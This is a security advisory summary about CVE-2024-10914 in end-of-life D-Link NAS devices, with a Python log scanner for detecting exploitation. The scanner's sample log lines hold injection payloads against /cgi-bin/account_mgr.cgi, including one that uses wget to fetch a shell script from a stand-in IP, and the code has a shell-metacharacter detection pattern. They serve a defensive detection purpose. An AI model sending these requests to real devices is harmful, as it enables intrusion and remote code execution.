November 13, 2024 at 01:37PM
A critical vulnerability (CVE-2024-10914) in end-of-life D-Link NAS devices allows unauthenticated command injection through a single crafted HTTP GET request. D-Link has ceased support for the affected models and advises customers to retire them. Despite the warnings, attackers have begun exploiting the flaw, and Internet scans have found over 41,000 exposed devices.
### Meeting Takeaways
1. **Critical Vulnerability Identified**: A command injection vulnerability (CVE-2024-10914) affecting multiple end-of-life D-Link NAS devices has been discovered, with publicly available exploit code.
2. **Exploitation Capability**: No credentials are required. An attacker who can reach the device's web interface sends a crafted HTTP GET request whose parameter value is passed unsanitized to a shell, so arbitrary shell commands execute on the NAS.
3. **Affected Models**: The at-risk devices include:
– DNS-320 Version 1.00
– DNS-320LW Version 1.01.0914.2012
– DNS-325 Versions 1.01 and 1.02
– DNS-340L Version 1.08
4. **D-Link’s Response**: D-Link announced that it will not provide fixes for the vulnerability since it impacts end-of-life (EOL) models. Customers are advised to retire or upgrade these devices to newer products.
5. **Security Recommendations**: D-Link emphasizes that EOL products no longer receive firmware updates or support and recommends replacing them. Customers who cannot replace an affected model immediately should, at minimum, remove its web interface from direct Internet exposure (no port forwarding or UPnP mappings to it) and reach it only from the local network or over a VPN.
6. **Threat Monitoring Findings**: Shadowserver reported that exploitation attempts began on November 12 and that its scans see over 1,100 exposed devices. Netsecfish, the researcher who disclosed the flaw, reported over 41,000 unique IP addresses belonging to vulnerable devices.
7. **Previous Vulnerabilities**: In April, Netsecfish reported another vulnerability impacting similar D-Link NAS models (CVE-2024-3273) that could be exploited for remote command execution.
8. **Usage Risks**: D-Link cautions against continued use of these devices because the risk keeps rising; comparable EOL D-Link NAS models have previously been targeted by ransomware.
9. **User Advisory**: Those who continue to use these devices despite D-Link's recommendation should at least run the last firmware release, while understanding that no firmware release addresses CVE-2024-10914, so exposure control rather than patching is the only available mitigation.
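Because no patch will ship, the practical question for anyone still running one of these models is whether it has already been hit. The following is an added example (not code from the page, D-Link, or Netsecfish) that scans web-server access logs for the pattern described above: unauthenticated GET requests to a CGI endpoint whose decoded query parameters contain shell metacharacters. The log lines are constructed, and the `/cgi-bin/account_mgr.cgi` path and `name` parameter used in them are taken from the public disclosure of CVE-2024-10914 rather than from this page; the detection itself does not depend on that specific path, so it also flags injection attempts against other CGI scripts.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
# Lines 1 and 3 carry shell metacharacters in the "name" parameter, line 2 is a
# benign request to the same endpoint, line 4 is unrelated.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Nov/2024:09:14:02 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bid%3B%27 HTTP/1.1" 200 512
198.51.100.3 - - [12/Nov/2024:09:15:10 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=alice HTTP/1.1" 200 512
203.0.113.9 - - [12/Nov/2024:09:16:44 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;wget%20http://203.0.113.9/x.sh;%27 HTTP/1.1" 200 512
198.51.100.5 - - [12/Nov/2024:09:17:00 +0000] "GET /index.html HTTP/1.1" 200 4096
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that terminate or chain a shell command, or open a quoted/command
# substitution. Any of these inside a value destined for a shell is a red flag.
SHELL_META = re.compile(r"[;'`|&$\n]")


def parse_line(line):
    """Return the fields of one CLF line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target, cgi_prefix="/cgi-bin/"):
    """Return [(param, decoded_value)] for query parameters that carry shell
    metacharacters, restricted to requests under the CGI prefix."""
    path, _, query = target.partition("?")
    if not path.startswith(cgi_prefix):
        return []
    hits = []
    # parse_qsl splits on '&' only and percent-decodes once; decode a second
    # time so double-encoded payloads (%2527 -> %27 -> ') are not missed.
    for key, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)
        if SHELL_META.search(decoded):
            hits.append((key, decoded))
    return hits


def scan_log(text):
    """Scan access-log text and return one alert per request that looks like a
    command-injection attempt: source IP, timestamp, path and offending params."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["target"])
        if hits:
            alerts.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": rec["target"].partition("?")[0],
                "status": rec["status"],
                "params": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["ip"]} {alert["path"]} -> {alert["params"]}')
```

A 200 status on a flagged request is not proof the command ran, since the CGI returns 200 whether or not the injected command succeeded; treat any hit as a compromise indicator and check the device for unexpected accounts, cron entries, or outbound connections to the IP in the payload.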
### Action Items
– **Monitor Threat Activity**: Track ongoing exploitation reporting for CVE-2024-10914 and CVE-2024-3273 (for example, Shadowserver's scan data) and review access logs of any affected device for unauthenticated requests carrying shell metacharacters.
– **User Communication**: Inform affected customers of the risk and strongly encourage retirement of the listed models, noting that no fix will be issued.
– **Security Measures**: Advise users who cannot retire a device immediately to remove its web interface from Internet exposure (no port forwarding or UPnP mappings) and to restrict access to the local network or a VPN.